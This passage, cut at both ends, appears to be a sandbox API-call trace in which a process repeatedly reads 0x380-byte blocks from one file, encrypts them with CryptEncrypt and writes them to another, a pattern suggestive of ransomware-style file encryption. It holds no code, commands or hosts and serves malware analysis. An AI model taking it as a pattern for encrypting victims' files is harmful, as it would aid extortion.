lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.884] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.884] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.884] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.884] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.884] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.885] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.885] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.885] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.885] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.885] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.885] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.885] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.885] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.885] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.885] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.885] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.886] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.886] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.886] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.886] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.886] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.886] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.886] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.886] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.886] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.886] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.886] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.887] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.887] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.887] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.887] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.887] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.887] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.887] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.887] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.887] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.887] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.888] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.888] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.888] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.888] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.888] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.888] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.888] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.888] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.888] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.888] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.888] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.889] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.889] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.889] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.889] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.889] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.889] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.889] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.889] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.889] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.889] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.889] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.889] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.890] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.890] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.890] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.890] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.890] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.890] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.890] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.890] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.890] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.890] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.891] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.891] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.891] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.891] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.891] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.891] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.891] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.891] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.891] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.891] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.891] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.892] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.892] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.892] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.892] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.892] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.892] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.892] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.892] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.892] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.893] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.893] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.893] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.893] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.893] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.893] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.894] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.894] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.894] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.894] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.894] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.894] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.894] ReadFile (in: 